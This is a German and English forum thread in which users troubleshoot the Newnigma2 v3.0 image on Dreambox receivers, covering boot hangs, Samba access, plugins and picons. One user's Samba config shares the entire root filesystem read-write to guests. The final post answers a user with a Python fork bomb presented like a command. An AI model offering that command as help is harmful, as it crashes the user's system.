DM8000: Newnigma2 v3.0

    • Original von jor
      Originally posted by Zaza
      Lüppt hier auch im Multiboot. Besten Dank für das Image! :blumen2:

      How have you done it ???
      For me it hangs during booting process ...

      Aktuelles Oozoon OE 1.6 im Flash und aktuelles Barry Allen 5.1.21.
    • samba win7-64bit 8k

      Hab nun mal das 3.0 ins flash genaun...

      neuen samba server installiert... kann auf hdd der Box zugreifen, .. nur lässt sich kein Film abspielen...

      danach alten 7025 samba server installiert.. gleicher fehler.. ( wobei beim RC2 lief der alte samba noch)

      komischerweise funktionieren ein paar der alten Filme einwandfrei...
      alles vor dem alten image 3rc1

      alles ab 3rc2 lassen sich nicht abspielen..

      neuerer nicht.. d.h. laesst sich nicht drauf zugreifen...

      was nun ?
      hier eine fehlermeldung vom vlc-

      Einlesen der Datei fehlgeschlagen:
      VLC konnte die Datei "X:\20100429 0355 - TNT Film (TCM) - Der gelbe Strom.ts" nicht lesen.
      Ihre Eingabe konnte nicht geöffnet werden:
      VLC kann die MRL 'X:\20100429 0355 - TNT Film (TCM) - Der gelbe Strom.ts' nicht öffnen. Sehen Sie für Details im Fehlerprotokoll nach.

      dieser film laesst sich normal in der Box abspielen. per ftp auf den pc kopiert ,dort mit vlc auch . nur ueber samba von der hdd der box nicht..... ?!?!?!?!?


      hier mal meine (neue) samba config..

      [global]
      load printers = no
      guest account = root
      log file = /tmp/smb.log
      log level = 1
      security = share
      server string = 8000
      workgroup = netz
      netbios name = 8000
      case sensitive=yes
      preserve case=yes
      short preserve case=yes
      socket options = TCP_NODELAY
      preferred master = no
      username map = /etc/samba/user.map

      [Configuration]
      comment = Configuration files - take care!
      path = /var
      read only = no
      public = yes
      guest ok = yes
      writable = yes

      [Harddisk]
      comment = The harddisk
      path = /hdd
      read only = no
      public = yes
      guest ok = yes
      writable = yes
      valid users = root

      [ALL]
      comment = ALL
      path = /
      public = yes
      read only = no
      guest ok = yes
      writeable = yes
      valid users = root


      mfg
      3 stk Dreambox 8000 - 7080 - One -Samsung 65" Full HD TFT - Denon 4308 AMP- T90 -> 42E - 28.2E - 23.5E - 19.2E - 13E - 9E - 7E - 5E - 1W - 4W -5W -8W - 12.5W

      1100 mbit Static IP

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von antivirus ()

    • Hallo, habe nun schon mehrfach das neue 3.0 geflasht. Box steht immer in der Mette des loadvorganges. Nach mehreren Ausschalten (ca. 5 - 6 mal) startet die Box durch. Dann funktioniert alles bis zum nächsten Neustart (Skinwechsel). Hatte jetzt über ein Jaht Newnigma im Flash. Was könnte ich tun?
    • Original von Randix
      Original von BeautifulDay
      Original von Traumkiste8000

      Kann es sein, das ipkg in der console nicht mehr geht?

      -sh: ipkg: not found


      Gleiches Problem auch bei mir. Leider kommt hinzu, daß ich keines der Plugins deinstallieren kann bzw. kommt jedesmal ein Fehler.

      Weiters kann ich keine Picons installieren, da ich keine Auswahl bekomme. Internet-Verbindung besteht aber. Für Ideen oder Anregungen bin ich dankbar.

      Achja, wiedermal ein grosses Danke an euch für das neue Image ! Tolle Arbeit, die ihr hier leistet


      Genauso ist es bei mir auch, die meisten Plugins lassen sich nicht deinstallieren.
      Im Erweiterungsmenü bekomme ich auch keine Plugins zum Installieren oder deinstallieren angezeigt.


      Bei mir funktioniert es jetzt, obwohl ich nichts verändert habe (diesen Spruch kennt man ja vom normalen DAU nur allzugut ;o))

      Image läuft bisher problemlos, danke nochmal
    • Boot/background image

      Guys, very manu thanks! it works great! Super image!!!! I see many happy users on a couple of forums!

      The boot/background screen is really nice. A little bit of issue though: The extreem black/white brightness is not that friendly to all of us who have 'plasma' screens. As one may know, high brightness/contrast will damage pixels by burning in.

      Would it be possible to update the background/boot image with a less bright one? Or is there a way I can do it myself for my box?

      Thanks a lot!
    • Boot hängt - starting...

      HILFE!!!
      Ich habe auch das neue Image eingespielt. Und auch bei mir hängt der Bootvorgang nachdem der Frontprozessor von 5 auf 7 upgedatet werden sollte.
      Ausknipsen bringt nix.

      Was ist hier die Lösung?

      Danke für Eure Hilfe

      Gruß Yopi
    • My box doesn't boot as well. I tried the 3.0 and i tried the unstable, installed DMM's last experimental that version works, after that trying to install 3.0 again but still no luck. I guess there's something wrong. Earlyer today i installed it onto a brandnew box and there it works just fine. My box is 2008. Probably old hardware issue?

      FreeSat
    • Auch ich möchte mich für das Image bedanken!

      Neo schreibt:
      Would it be possible to update the background/boot image with a less bright one?

      Dieser Frage schließe ich mich an und bitte auch um weniger "weiß" im Bootlogo.

      Gruß
      Dieter
    • Hi,
      vielen Dank für das Image .

      Meine Skin Picons von USB funzen nicht mehr , LCD Picons gehen.
      Wer weiß Rat ?

      USB-Stick:
      Diese werden nach dem Anschluss an die Dreambox als SDA1 erkannt (sofern nur ein USB-Stick sich an der Dreambox befindet). Nach einem Neustart ist der Stick nun auf /media/hdd zu finden


      Bei mir ist es immer noch :autofs/33b7b47e-d918-442b-90c6-b65c1bdf3fb4/


      mfg
      terra7

      Dream 920

      Draem One

      Dream 7080

      :prost:
    • Original von terra7
      Hi,
      vielen Dank für das Image .

      Meine Skin Picons von USB funzen nicht mehr , LCD Picons gehen.
      Wer weiß Rat ?

      USB-Stick:
      Diese werden nach dem Anschluss an die Dreambox als SDA1 erkannt (sofern nur ein USB-Stick sich an der Dreambox befindet). Nach einem Neustart ist der Stick nun auf /media/hdd zu finden


      Bei mir ist es immer noch :autofs/33b7b47e-d918-442b-90c6-b65c1bdf3fb4/


      mfg


      Das iss aber auch schwer 3 knöppe zu drücken.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !